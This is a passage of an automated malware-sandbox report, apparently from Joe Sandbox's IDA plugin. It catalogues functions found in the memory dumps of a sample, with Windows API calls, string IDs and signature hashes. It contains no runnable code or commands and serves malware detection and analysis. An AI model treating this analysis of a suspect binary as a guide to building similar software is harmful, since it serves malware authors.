                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                • Opcode ID: c8b9f036f534687e1aaed84f20931c1aeacd3f98fcf9c310a90854ced8f9edad
                                                                                                                • Instruction ID: 7bfc1dd2b110e14e8b36b5b1ecc8d6d44ea21fc63f91a6ad32ed3d87ad8d4543
                                                                                                                • Opcode Fuzzy Hash: c8b9f036f534687e1aaed84f20931c1aeacd3f98fcf9c310a90854ced8f9edad
                                                                                                                • Instruction Fuzzy Hash: 7811E431514114AFDB24AB70EC4AFEA77BCEF82711F0401BAF549960E1FFB19E829A50
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 00944F7A
  • Part of subcall function 0090049F: timeGetTime.WINMM(?,7694B400,008F0E7B), ref: 009004A3
• Sleep.KERNEL32(0000000A), ref: 00944FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00944FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00944FEC
• SetActiveWindow.USER32 ref: 0094500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00945019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00945038
• Sleep.KERNEL32(000000FA), ref: 00945043
• IsWindow.USER32 ref: 0094504F
• EndDialog.USER32(00000000), ref: 00945060
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: c88be563b50b12d48efcb977a07e9c4cd378fb7f84401619eca2dfdab0a65632
• Instruction ID: 776c6ed5d87545c76b9eddf69f3af2748af34347cf5fca3a822219e545687c0b
• Opcode Fuzzy Hash: c88be563b50b12d48efcb977a07e9c4cd378fb7f84401619eca2dfdab0a65632
• Instruction Fuzzy Hash: 3D21AE7462C605BFE7106F70FC99F263B69EF46745F0A2028F506821F1DBB18D14EAA2
APIs
  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
• CoInitialize.OLE32(00000000), ref: 0094D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0094D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0094D691
• CoCreateInstance.OLE32(00972D7C,00000000,00000001,00998C1C,?), ref: 0094D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0094D74C
• CoTaskMemFree.OLE32(?,?), ref: 0094D7A4
• _memset.LIBCMT ref: 0094D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0094D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0094D840
• CoTaskMemFree.OLE32(00000000), ref: 0094D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0094D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0094D880
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: d49e06902a0ab506d060e6e69152a17f31e0db92631e903effdbed8080d814b3
• Instruction ID: ca93fd57c3aa1064d0c85977c4106d48de049dae232557bd4630eb0820e2317e
• Opcode Fuzzy Hash: d49e06902a0ab506d060e6e69152a17f31e0db92631e903effdbed8080d814b3
• Instruction Fuzzy Hash: 5EB11D75A00119AFDB04DFA8C898DAEBBB9FF49314F148469F909DB261DB70ED41CB50
APIs
• GetDlgItem.USER32(?,00000001), ref: 0093C283
• GetWindowRect.USER32(00000000,?), ref: 0093C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0093C2F3
• GetDlgItem.USER32(?,00000002), ref: 0093C2FE
• GetWindowRect.USER32(00000000,?), ref: 0093C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0093C364
• GetDlgItem.USER32(?,000003E9), ref: 0093C372
• GetWindowRect.USER32(00000000,?), ref: 0093C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0093C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0093C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0093C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0093C3FE
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: d6d6dc9679b459e0041b2894d067b17f01d51b5458d7efaf1df5aee05cb79b2b
• Instruction ID: bf103607bea40309fff6648e32d78676866d32f7bc926e80947c990633807ffe
• Opcode Fuzzy Hash: d6d6dc9679b459e0041b2894d067b17f01d51b5458d7efaf1df5aee05cb79b2b
• Instruction Fuzzy Hash: 945145B1B10605AFDF18CFA9DD99A6EBBBAFB88711F14812DF515E7290D7B09D008B10
APIs
  • Part of subcall function 008E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008E2036,?,00000000,?,?,?,?,008E16CB,00000000,?), ref: 008E1B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008E20D3
• KillTimer.USER32(-00000001,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 008E216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0091BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 0091BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 0091BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E16CB,00000000,?,?,008E1AE2,?,?), ref: 0091BD0A
• DeleteObject.GDI32(00000000), ref: 0091BD1C
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 57d3f1631cc030ed001a277218750c6b6535e76096287c7fab351dcb3669020e
• Instruction ID: eac8830bc21916976a726a2ef0d4b21eda5103a93ac5112aa49971090c7c643c
• Opcode Fuzzy Hash: 57d3f1631cc030ed001a277218750c6b6535e76096287c7fab351dcb3669020e
• Instruction Fuzzy Hash: 6261BF31228A54DFCB359F1AE958B2977F6FF42316F11452CE042D65B0C7B4A880EF81
APIs
  • Part of subcall function 008E25DB: GetWindowLongW.USER32(?,000000EB), ref: 008E25EC
• GetSysColor.USER32(0000000F), ref: 008E21D3
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 242af940c7861d3cabe33c28861d4216c1f42c35c54d3f136e0720cb9aa38655
• Instruction ID: da77d69bfe1cb1dadf1234591bb80a7b91a5074461b6420a7153aba35775d85b
• Opcode Fuzzy Hash: 242af940c7861d3cabe33c28861d4216c1f42c35c54d3f136e0720cb9aa38655
• Instruction Fuzzy Hash: 6741D331108184DBDB215F29EC98BB97B6AFB07331F154269FE65CA1E1C7718C82EB61
APIs
• CharLowerBuffW.USER32(?,?,0096F910), ref: 0094A90B
• GetDriveTypeW.KERNEL32(00000061,009989A0,00000061), ref: 0094A9D5
• _wcscpy.LIBCMT ref: 0094A9FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 29893b29f41ecf3da41dbe879e5e2cc053eeda1a1319ce788b448c061cd51fde
• Instruction ID: 8eb85c819318100628658b43c2a786307d264a563a9f267a1333ff5cd5f716b1
• Opcode Fuzzy Hash: 29893b29f41ecf3da41dbe879e5e2cc053eeda1a1319ce788b448c061cd51fde
• Instruction Fuzzy Hash: 08519B31248341AFC710EF19C892EAFB7E9FF86304F14482DF596972A2DB719909CA53
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: 5bdaed4bc1a871421d6de02b48565ddc732946dc45d3fdbcd06232b61e7e9716
• Instruction ID: 386fecc09f60cc07dbf2b4dd6fa80b1e84e9e069237b8f45be67d6fcc28ec9e4
• Opcode Fuzzy Hash: 5bdaed4bc1a871421d6de02b48565ddc732946dc45d3fdbcd06232b61e7e9716
• Instruction Fuzzy Hash: 2941D47161020DAEDB24DF39D842BBA73E9FF86304F20447EE599DB292EA7199418B11
APIs
• _memset.LIBCMT ref: 0096716A
• CreateMenu.USER32 ref: 00967185
• SetMenu.USER32(?,00000000), ref: 00967194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00967221
• IsMenu.USER32(?), ref: 00967237
• CreatePopupMenu.USER32 ref: 00967241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0096726E
• DrawMenuBar.USER32 ref: 00967276
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: c749029d4468838840cd000d58d4c4188fbb0d8dcfd55410d4613b44baa62c1c
• Instruction ID: 9b0485200a3cce9d5357e7a5cc7d9ba2b0a795d92c5638596f1f4fcb28bc3220
• Opcode Fuzzy Hash: c749029d4468838840cd000d58d4c4188fbb0d8dcfd55410d4613b44baa62c1c
                                                                                                                • Instruction Fuzzy Hash: 10418874A15209EFDB20DFA4E894EAABBB9FF09314F140029F916A7360D771AD14DF90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0096755E
• CreateCompatibleDC.GDI32(00000000), ref: 00967565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00967578
• SelectObject.GDI32(00000000,00000000), ref: 00967580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0096758B
• DeleteDC.GDI32(00000000), ref: 00967594
• GetWindowLongW.USER32(?,000000EC), ref: 0096759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009675B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009675BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: ec8ade2765a87cb0c334f9a8f9e3a67967d74ee7cee41abfce5dcc6e07670d57
• Instruction ID: 7cb1f8ad76a77bb8fdf18fbd1b7dd50a52746051cb076b43e29024cd4987dd03
• Opcode Fuzzy Hash: ec8ade2765a87cb0c334f9a8f9e3a67967d74ee7cee41abfce5dcc6e07670d57
• Instruction Fuzzy Hash: 48317072118215BBDF119FA4EC18FDB7B6DFF09764F110228FA16960A0D771D811EBA4
APIs
• _memset.LIBCMT ref: 00906E3E
  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
• __gmtime64_s.LIBCMT ref: 00906ED7
• __gmtime64_s.LIBCMT ref: 00906F0D
• __gmtime64_s.LIBCMT ref: 00906F2A
• __allrem.LIBCMT ref: 00906F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00906F9C
• __allrem.LIBCMT ref: 00906FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00906FD1
• __allrem.LIBCMT ref: 00906FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00907006
• __invoke_watson.LIBCMT ref: 00907077
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: 8f7dcc132c213a93bbdae73c2e3be14aa94f0dc382ff4053c9d94ba6f71f3819
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: 327106B6E00717AFDB14AE68DC41B9AB7B8AF44760F148629F514E72C1E770ED508B90
APIs
• _memset.LIBCMT ref: 00942542
• GetMenuItemInfoW.USER32(009A5890,000000FF,00000000,00000030), ref: 009425A3
• SetMenuItemInfoW.USER32(009A5890,00000004,00000000,00000030), ref: 009425D9
• Sleep.KERNEL32(000001F4), ref: 009425EB
• GetMenuItemCount.USER32(?), ref: 0094262F
• GetMenuItemID.USER32(?,00000000), ref: 0094264B
• GetMenuItemID.USER32(?,-00000001), ref: 00942675
• GetMenuItemID.USER32(?,?), ref: 009426BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00942700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00942714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00942735
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 6500333a154a3280700f1e3a7ca1ca1c0ca43558bca177f23078d765e5376fb6
• Instruction ID: b1111bb025eadd88d04d76c7c5ff8ecd4bf58031fbc076cb643a65235bd14a37
• Opcode Fuzzy Hash: 6500333a154a3280700f1e3a7ca1ca1c0ca43558bca177f23078d765e5376fb6
• Instruction Fuzzy Hash: B061BB70914249AFDB21CFA4DC98EBEBBB8FB41304F95046AF842A7290D771AD05DB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00966FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00966FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00966FCC
• _memset.LIBCMT ref: 00966FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00966FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00967067
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: df9ce6560839e60d539d0ed7fa7eccf71a694f8c9aa828e6772ab7793ba2489d
• Instruction ID: e256dca42f218d45e2f858b7dad55c06d17691d226744d6b61d8c45c9e32f529
• Opcode Fuzzy Hash: df9ce6560839e60d539d0ed7fa7eccf71a694f8c9aa828e6772ab7793ba2489d
• Instruction Fuzzy Hash: 7D617E75A04208AFDB11DFA4CC81EEE77F8EF09714F10015AFA14AB2A1C775AD45DBA0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00936BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00936C18
• VariantInit.OLEAUT32(?), ref: 00936C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00936C4A
• VariantCopy.OLEAUT32(?,?), ref: 00936C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00936CB1
• VariantClear.OLEAUT32(?), ref: 00936CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00936CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00936CDC
• VariantClear.OLEAUT32(?), ref: 00936CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00936CF9
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: bf2a75307c6a02e9511fd09dfe60ca90f4e4170ae4bad28655a0649aed26557c
• Instruction ID: a146333e733966b8c44036b82c026cd96cf908376c770eaea835eec674659baa
• Opcode Fuzzy Hash: bf2a75307c6a02e9511fd09dfe60ca90f4e4170ae4bad28655a0649aed26557c
• Instruction Fuzzy Hash: 6C416071A04219AFCF00DFA9D8589AEBBB9FF48350F00C079E955E7261CB70A945DF91
APIs
  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
• CoInitialize.OLE32 ref: 00958403
• CoUninitialize.OLE32 ref: 0095840E
• CoCreateInstance.OLE32(?,00000000,00000017,00972BEC,?), ref: 0095846E
• IIDFromString.OLE32(?,?), ref: 009584E1
• VariantInit.OLEAUT32(?), ref: 0095857B
• VariantClear.OLEAUT32(?), ref: 009585DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: a105fbc644018e03c21eb33a91faa81f6b1080ae192159ed6f9d3c2ad76b885c
• Instruction ID: 148d461e3590c7463a35ba46da81f55aef639cebf52de04c4bd7c2b480c25f32
• Opcode Fuzzy Hash: a105fbc644018e03c21eb33a91faa81f6b1080ae192159ed6f9d3c2ad76b885c
• Instruction Fuzzy Hash: 9C61BC706083129FC710DF16C848B6BB7E8AF89745F00085DFD86AB2A1DB70ED49CB92
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00955793
• inet_addr.WSOCK32(?,?,?), ref: 009557D8
• gethostbyname.WSOCK32(?), ref: 009557E4
• IcmpCreateFile.IPHLPAPI ref: 009557F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00955862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00955878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 009558ED
• WSACleanup.WSOCK32 ref: 009558F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: ea3187b6f2a5beab34aee7ee74efe4b4d21d4d77f486858759226791baf8e940
• Instruction ID: 2b7da49c0a842d9373c397c06b36f52989652c849c37c48410e13133e1bc935f
• Opcode Fuzzy Hash: ea3187b6f2a5beab34aee7ee74efe4b4d21d4d77f486858759226791baf8e940
